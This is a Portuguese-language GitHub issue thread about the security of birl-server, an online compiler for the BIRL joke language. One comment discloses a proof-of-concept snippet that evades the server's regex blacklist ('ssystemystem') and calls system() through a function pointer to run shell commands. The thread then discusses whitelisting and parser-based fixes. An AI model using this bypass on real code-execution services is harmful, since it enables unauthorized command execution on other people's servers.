### ISSUE TITLE
código liberadasso.

### ISSUE THREAD

**Issue by cesarvargas00** [birl-language/birl-server#4]
Cara, cuidado com as permissões desse server aí! Se eu fosse você, rodava esse `gcc` dentro de um docker container pra ficar mais seguro! Se alguém codar aí alguma coisa em BIRL que apaga/rouba chave/etc , por exemplo; fudeu 💨

**Comment by akaFTS** [comment]
A gente ta usando um dyno no Heroku só pra isso! Não tem nada pra estragar lá :)

**Comment by yuriwallace** [comment]
Mesmo que não tenha nada importante, alguém pode se utilizar-se das falhas de segurança do ambiente e do parser para implantar um XSS ou para negação de serviço ou para adicionar a mesma numa botnet, um exemplo simples:

`HORA DO SHOW
  
    CE QUER VER ESSA PORRA? ( "Current code: %s\n" , __FILE__ );
    
    int res = 0;
    
    /**
     * load function on memory. ssystemystem bypass regex
     * 
     * @url https://github.com/birl-language/birl-server/blob/master/birlToC.js#L47
     * @url https://github.com/birl-language/birl-server/blob/master/birlToC.js#L48
     */
    ssystemystem/** **/( "help" );

    //get pointer from system
    void (*exec)(int);
    exec = &ssystemystem;

    CE QUER VER ESSA PORRA? ( "ssystemystem's pointer: %p\n" , exec );
    
    exec( "ps" );
    
    BORA CUMPADE 0;
BIRL`

Uma solução para a grande maioria dos casos que eu testei seria inicialmente sanitizar o código para o mínimo necessário, redefinir as funções de ambiente de stdio e stlib e remover todas as funções não utilizadas ( ao invés de blacklist usar uma whitelist ).
A segunda solução seria fazer um parser usando a AST do javascript, como o coffescript. Como parece que vocês tem cultura de node.js o http://pegjs.org/ poderia ser útil.

**Comment by sennav** [comment]
Fala bodybuilders,

Eu sei que o meme tá velho, mas saí de casa e codei pra caralho e eu tô fazendo essas paradas de linguagem de programação como hobby. Decidi fazer como o @yuriwally sugeriu, por coincidência (sem lembrar de ter lido a sugestão pelo menos), e implementei um transpilador de birl para Javascript porque _"why not?"_. O repo tá [aqui](https://github.com/sennav/birl), se vcs quiserem posso transferir o repo para a organização BIRL. Nesse repo, birl transpila pra js não sei se isso resolve todos os problemas de segurança por que com essa implementação dá pra acessar a biblioteca padrão javascript, então se vcs decidirem rodar isso em um `eval` em um browser eu acho que devem existir algumas vulnerabilidades ainda, em node pior ainda. Mas...

BORA CONSTRUIR FIBRA PORRA!
